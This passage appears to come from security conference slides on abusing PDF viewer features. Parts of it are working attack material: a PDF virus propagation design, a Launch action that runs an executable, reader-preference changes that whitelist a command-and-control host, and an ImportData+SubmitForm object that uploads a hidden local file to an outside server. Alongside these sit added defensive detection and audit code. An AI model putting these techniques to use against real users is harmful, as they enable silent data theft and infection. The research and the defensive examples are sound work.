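    (rb"/S\s*/SubmitForm", "SubmitForm", "Reader's own HTTP client"),
    (rb"/S\s*/URI", "URI", "system browser"),
    (rb"/S\s*/GoToR", "GoToR", "Reader fetches another document"),
    (rb"/FS\s*/URL", "external stream", "Reader fetches stream data"),
    (rb"app\.launchURL\s*\(", "JavaScript launchURL", "system browser"),
    (rb"\.submitForm\s*\(", "JavaScript submitForm", "Reader's own HTTP client"),
]
# Triggers visible in the same object. Document-level JavaScript reached through
# /Names also runs at open time but needs the name tree resolved; not done here.
AUTO_TRIGGER = re.compile(rb"/OpenAction|/AA\s*<<\s*/O\b")


def find_egress(data: bytes) -> list:
    """List every object that names an outbound URL, which PDF feature sends it,
    and whether the same object wires it to an automatic trigger."""
    findings = []
    for num, body in OBJ.findall(data):
        urls = URL.findall(body)
        if not urls:
            continue
        mechanism, carrier = "unknown", "unknown"
        for pattern, label, via in MECHANISMS:
            if re.search(pattern, body):
                mechanism, carrier = label, via
                break
        for url in urls:
            findings.append({"object": int(num), "mechanism": mechanism, "via": carrier,
                             "url": url.decode("ascii", "replace"),
                             "auto": bool(AUTO_TRIGGER.search(body))})
    return findings


if __name__ == "__main__":
    for f in find_egress(SAMPLE_PDF):
        print(f"obj {f['object']:>2}  {f['mechanism']:<22} via {f['via']:<32} "
              f"auto={f['auto']}  {f['url']}")
```

The "via" column is the part worth keeping in a triage report: a /URI or launchURL request shows up in the browser's logs and proxy settings, whereas a SubmitForm request is made by the viewer itself, so it is the viewer's network egress (not the browser's) that has to be proxied, logged or blocked to see it.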


Comparing webbugs

Adobe Reader's ways to handle network connections
- When related to a URL (/URI, app.launchURL): outsourced webbugs

execve("/usr/bin/firefox", ["firefox", "-remote", "openURL(http://seclabs.org/fred/webbug-reader.php,new-tab)"], [/* 45 vars */]) = 0

- When related to forms (/SubmitForm, this.submitForm): built-in network capabilities

# Get IP address
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 29
connect(29, sa_family=AF_INET, sin_port=53, sin_addr=inet_addr("10.42.42.1")) = 0
recvfrom(29, ...) = 45
# Connect to the server
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 29
connect(29, sa_family=AF_INET, sin_port=80, sin_addr=inet_addr("..."), 16)
send(29, "GET /fred/webbug-reader.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4\r\nHost: seclabs.org\r\nAccept: */*\r\n\r\n"..., 179, 0) = 179
recv(29, "HTTP/1.1 200 OK\r\n...) = 1448

Browser vulnerabilities
- Firefox/1.0.4: old browser banner. Are all fixes backported?
- http://www.mozilla.org/security/known-vulnerabilities/


Embedded files

Dropping attachments
- When launched, attachments are saved in a temp folder
- Remember: filtering is based on the file extension...
- ...and PDF/FDF extensions are whitelisted by default
- A malicious .pdf file can then be written to disk, whatever its real nature
- But:
  - We cannot decide where exactly it is written
  - Reader erases its temp folder upon application shutdown


Multimedia session

Downloading videos
- Clips and music can be read from a PDF document
- Multimedia content may be downloaded from a remote server
- Transferred data is saved into the local player cache

Playing an embedded file
- An embedded video/sound file can be played in a document
- The attachment is dropped into the user temp folder when playing
- A hidden player can play a file with null volume


Code execution

Launch action
- This action can launch an application on the host system
- Parameters can be passed on the command line
- Can run different commands depending on the OS
- The user is warned through a pop-up

PDF code: launch the system calculator
/OpenAction << /S /Launch /F << /DOS (C:\WINDOWS\system32\calc.exe) /Unix (/usr/bin/xcalc) /Mac (/Applications/Calculator.app) >> >>


Code execution

File attachments
- Embedded files can be executed
  - Using an attachment annotation
  - Using the JavaScript exportDataObject method

Bypassing the filename extension filter
- Foxit/Adobe Reader 8: the JAR extension has not been blacklisted
- Adobe Reader 9: a flaw in the path filter permits bypassing the blacklist check
- More generally, a filename extension cannot represent the real nature of the file
- Conclusion: filename blacklisting is no security
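The "Embedded files" slide and this one make the same point from two sides: a whitelist of .pdf/.fdf by name lets a renamed executable reach the disk, and a blacklist by name misses any extension nobody thought of. The Python below is an added example for this edit, not code from the slides or a description of Reader's actual filter: it puts the name-only blacklist decision next to a content decision that identifies the attachment by its leading bytes and requires the name to agree, so the same inputs show where each approach fails. The blacklist contents, magic table and function names are chosen for the example.

```python
import re

# Leading bytes that identify the container types a viewer is likely to meet.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"%FDF-", "fdf"),
    (b"MZ", "exe"),              # PE/DOS executables, DLLs, screensavers
    (b"\x7fELF", "elf"),
    (b"PK\x03\x04", "zip"),      # also JAR, DOCX and friends
    (b"\xff\xd8\xff", "jpg"),
]
# Extensions that are only other spellings of a sniffed type.
ALIASES = {"jar": "zip", "docx": "zip", "xlsx": "zip", "jpeg": "jpg",
           "dll": "exe", "scr": "exe"}

# The kind of list the slides describe: block known-bad extensions, treat the
# rest (including .pdf/.fdf) as safe. Illustrative contents, not Reader's list.
BLACKLIST = {"exe", "bat", "cmd", "com", "vbs", "js", "scr", "dll", "msi"}


def sniff(data: bytes) -> str:
    """Identify a blob by its leading bytes; 'unknown' when nothing matches."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def claimed_extension(name: str) -> str:
    """Extension as a filter would see it: last path component, trailing spaces
    and dots dropped, lower-cased, aliases folded. 'report.pdf ' -> 'pdf'."""
    base = re.split(r"[\\/]", name)[-1].rstrip(" .").lower()
    ext = base.rsplit(".", 1)[-1] if "." in base else ""
    return ALIASES.get(ext, ext)


def blacklist_decision(name: str) -> str:
    """Name-only filtering: allow anything whose extension is not listed."""
    return "block" if claimed_extension(name) in BLACKLIST else "allow"


def content_decision(name: str, data: bytes, allowed=("pdf", "fdf")) -> tuple:
    """Allow-list by content: the bytes must be a permitted type and the name
    must agree with them; everything else is refused with a reason."""
    kind = sniff(data)
    ext = claimed_extension(name)
    if kind not in allowed:
        return "block", f"content is {kind}, not in the allow-list"
    if ext != kind:
        return "block", f"extension '{ext}' disagrees with content '{kind}'"
    return "allow", f"{kind} by content and by name"


if __name__ == "__main__":
    cases = [("update.pdf", b"MZ\x90\x00\x03"), ("tool.jar", b"PK\x03\x04\x14\x00"),
             ("notes.pdf", b"%PDF-1.4\n%%EOF\n")]
    for name, data in cases:
        print(f"{name:<12} blacklist={blacklist_decision(name):<6} "
              f"content={content_decision(name, data)}")
```

The two attachments the slides mention both pass the name-only check (a .pdf that is really an executable, a .jar that is not on the list) and both fail the content check. Sniffing is not a complete answer either (a COM file, as the earlier slide notes, has no header at all), which is why the content rule is an allow-list: anything it cannot positively identify as a permitted type is refused.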


Bad idea #1: PDF virus

PDF virus PoC
1. Create malicious PDF files based on features
   - Embed a malicious file attachment
   - Sign the PDF files with Adobe's private key
   - Enable Usage Rights, especially the Save right
2. Initial infection: distribute the malicious PDFs, which corrupt others
3. Propagation: each time Reader is run, a JavaScript is run (privileged context), and can open malicious PDFs in a hidden window

Initial infection, in detail:
- Ex.: fake resume sent to companies, software documentation, newspaper articles, PDF books, ...
- If a host is already infected, privileged functions are automatically accessible
- Otherwise wait for a stupid end-user to let the attachment go...
- The configuration is then corrupted
  - Allow connections to a master site
  - Add a new JavaScript run at start-up of Adobe Reader
- PDF files on the victim system are also infected and polymorphed

Propagation, in detail:
- Check whether the Reader is already corrupted (and try to infect the system if needed)
- Check whether the PDF is already corrupted (and infect it otherwise)
- Connect to a master site, and maybe download a PDF virus update if needed


Attacker's security issues

Before starting
- PDFs are natural in any system and network environment
- PDFs are naturally well suited to bypass detection
- PDFs are a good communication channel

Constraint
- The attack must require no privilege other than standard user


Targeted attack: 2 stages to steal data

Data theft in PDF
1. Contaminate the target: send a poisoned PDF
   - Contains an embedded file executed when the doc is opened
     - E.g. social engineering to make it look like an update of the Reader
     - Provide an Adobe-signed PDF to abuse trust
   - The embedded binary prepares the files to export
     - All files to export are copied into a hidden directory
     - When copied, each is embedded in a minimalist FDF file
     - A list of all the files is created in FDF, with a /F pointing to the C&C site
   - Corrupt the configuration
     - Add the attacker's C&C site to the whitelist
     - Add a JavaScript in the user's directory: next time a PDF is opened, the list is opened (hidden) too, and submitted to the C&C site
     - The JavaScript disables itself using a global variable
2. Data theft: exporting the precious files


Data theft, in detail:
- The attacker builds a PDF with both an ImportData + SubmitForm
- The PDF is sent to the target: the attacker just has to wait for the target to open the malicious PDF


Stage 1: corrupting the Reader

Change the target's configuration
- Enable sharing of JS global variables among documents
  - Saves information across sessions / communication between malicious documents
  JSPrefs/bEnableGlobalSecurity = 0
- Whitelist the attacker's server hostname
  - So we can freely output information to an evil server
  TrustManager/cDefaultLaunchURLPerms/tHostPerms = version:1|seclabs.org:2
- Whitelist unknown attachment extensions
  - So we can easily re-infect the victim system
  Attachments/cUserLaunchAttachmentPerms/iUnlistedAttachmentTypePerm = 2
- Add the attacker's certificate into the local user store with full trusting privileges
  - The attacker's certified documents can use privileged JavaScript
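Because all three settings above live in a user-writable reader_prefs file (the "Webbug and whitelist" slide showed its layout), the defender's counterpart is to read that file back and flag the values stage 1 leaves behind. The Python below is an added example for this edit, not code from the slides: a small parser for the "/Name [/type value]" layout the slides show, a flattener that produces key paths in the slides' own notation, and an audit of the three settings. The samples are constructed; the encodings assumed for boolean and integer values ([/b ...], [/i ...]) follow the type letters in the slides' key paths but are not taken from the slides, and the function names are chosen here.

```python
import re

# Constructed samples in the layout the slides show for reader_prefs. The value
# encodings for booleans ([/b ...]) and integers ([/i ...]) follow the type
# letters used in the slides' key paths (b, i, t, c) and are an assumption here.
WEAK_PREFS = b"""
/JSPrefs [/c << /EnableGlobalSecurity [/b false] >>]
/TrustManager [/c << /DefaultLaunchURLPerms [/c << /HostPerms [/t (version:1|seclabs.org:2)] >>] >>]
/Attachments [/c << /UserLaunchAttachmentPerms [/c << /UnlistedAttachmentTypePerm [/i 2] >>] >>]
"""

HARDENED_PREFS = b"""
/JSPrefs [/c << /EnableGlobalSecurity [/b true] >>]
/TrustManager [/c << /DefaultLaunchURLPerms [/c << /HostPerms [/t (version:1)] >>] >>]
"""

TOKEN = re.compile(rb"<<|>>|\[|\]|/[A-Za-z0-9_]+|\((?:[^()\\]|\\.)*\)|[^\s\[\]<>()/]+")


def parse_prefs(data: bytes) -> dict:
    """Parse '/Name [/type value]' entries, recursing into [/c << ... >>]
    containers. Returns {(type, name): value}; container values are dicts."""
    toks = TOKEN.findall(data)
    pos = 0

    def entries(closer):
        nonlocal pos
        result = {}
        while pos < len(toks) and toks[pos] != closer:
            name = toks[pos][1:].decode("ascii")
            typ = toks[pos + 2][1:].decode("ascii")      # /c /t /b /i
            pos += 3                                      # past '/Name', '[', '/type'
            if typ == "c":
                pos += 1                                  # '<<'
                value = entries(b">>")
                pos += 1                                  # '>>'
            elif typ == "t":
                value = toks[pos][1:-1].decode("latin-1")
                pos += 1
            elif typ == "b":
                value = toks[pos] == b"true"
                pos += 1
            elif typ == "i":
                value = int(toks[pos])
                pos += 1
            else:
                raise ValueError(f"unknown value type /{typ} for {name}")
            pos += 1                                      # ']'
            result[(typ, name)] = value
        return result

    return entries(None)


def flatten(tree: dict, prefix: str = "", top: bool = True) -> dict:
    """Key paths in the slides' notation: top-level name, then type-prefixed
    names, e.g. TrustManager/cDefaultLaunchURLPerms/tHostPerms."""
    out = {}
    for (typ, name), value in tree.items():
        key = name if top else typ + name
        path = f"{prefix}/{key}" if prefix else key
        if typ == "c":
            out.update(flatten(value, path, False))
        else:
            out[path] = value
    return out


def allowed_hosts(settings: dict) -> list:
    """Hosts whitelisted for URL launches without a prompt (code 2 in the slides)."""
    perms = settings.get("TrustManager/cDefaultLaunchURLPerms/tHostPerms", "")
    return [h.rsplit(":", 1)[0] for h in perms.split("|")
            if not h.startswith("version:") and h.endswith(":2")]


def audit(data: bytes) -> list:
    """(path, value, why it matters) for each setting the slides' stage 1 changes."""
    s = flatten(parse_prefs(data))
    findings = []
    if s.get("JSPrefs/bEnableGlobalSecurity") is False:
        findings.append(("JSPrefs/bEnableGlobalSecurity", False,
                         "JavaScript globals are shared between documents and survive sessions"))
    hosts = allowed_hosts(s)
    if hosts:
        findings.append(("TrustManager/cDefaultLaunchURLPerms/tHostPerms", hosts,
                         "URL launches to these hosts never prompt the user"))
    if s.get("Attachments/cUserLaunchAttachmentPerms/iUnlistedAttachmentTypePerm") == 2:
        findings.append(("Attachments/cUserLaunchAttachmentPerms/iUnlistedAttachmentTypePerm", 2,
                         "attachments with unlisted extensions can be launched"))
    return findings


if __name__ == "__main__":
    for path, value, why in audit(WEAK_PREFS):
        print(f"{path} = {value!r}: {why}")
    print("hardened sample:", audit(HARDENED_PREFS))
```

Run against a baseline copy of the file, the same parser also answers the question the certificate-store slide raises: any key path or host that is present in the user's file but absent from the baseline was written after deployment, and on a standard-user machine only the user (or something running as the user) could have written it.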

Preparing data leakage

Generating FDF files
- FDF: close to PDF, designed to exchange data between Adobe applications
- A PDF can load an FDF to auto-fill form fields
- Targeted files shall then be converted into FDF so that they can be loaded and submitted with a PDF form

<< /FDF <<
      /Fields [
         << /T (fname) /V (secret.doc) >>
         << /T (pwd) /V (2489cc8dc38d546170c57f48c92ea1a6) >>
         << /T (content) /V (This is the most precious secret I have ...) >>
      ]
      /JavaScript << /Before (app.alert("FDF file loaded");) >>
   >>
>>


Stage 2: data theft

Automatic file extraction: ImportData + SubmitForm

1 0 obj
<< /OpenAction <<
      /S /ImportData
      /F << /F (c:\\some\hidden\place\secret.fdf) /FS /FileSpec >>
      /Next <<
         /S /SubmitForm
         /F << /F (http://seclabs.org/fred/pdf/upload.php) /FS /URL >>
         /Flags 4
         /Fields [ 4 0 R 5 0 R 6 0 R 7 0 R ]
      >>
   >>
>>
endobj


Summary

A matter of version
- Able to sign PDFs with Adobe's certificate
- With Adobe Reader 8:
  - Can read any file thanks to external streams
  - Can run embedded jar files
- With Adobe Reader 9:
  - Can read only PDF / FDF files (which are easy to create)
  - Can run any kind of file thanks to a flaw in the extension parser
- Write access is still the most tedious to gain


Roadmap

PDF 101
The PDF way of security
Thinking malicious PDF
Darth Origami: dark side of PDF
Last words


Conclusion

PDF, a new security risk?
PDF is still considered harmless by most people
Malicious PDFs are (almost) OS-independent

A word about the readers
Adobe Reader: each version has new (useful?) features...
  Obvious security is well handled... even if too much of the security configuration is still left at user level
  Blacklist security
Foxit: many features are supported... with no security at all
Preview, poppler: minimalist viewers with few supported features


Where to seek next?

Other ideas
The JavaScript engine, with its undocumented functions
The embedded browser, rather old-fashioned
XFA forms
Unclear configuration features (e.g. user rights)
Embedding PostScript programs
Playing with multimedia and caches
IE / Firefox plug-ins
...


Q & (hopefully) A

Slides available for download (in PDF of course ;-): http://security-labs.org/fred/
Thanks to Eric Filiol, my padawans at Sogeti/ESEC, my boss at Sogeti/ESEC, Pierre-Marc Bureau and Master Yoda
Special THANKS to the translators team, Tomoyuki Sakurai and David Thiel, for the Japanese version of these slides

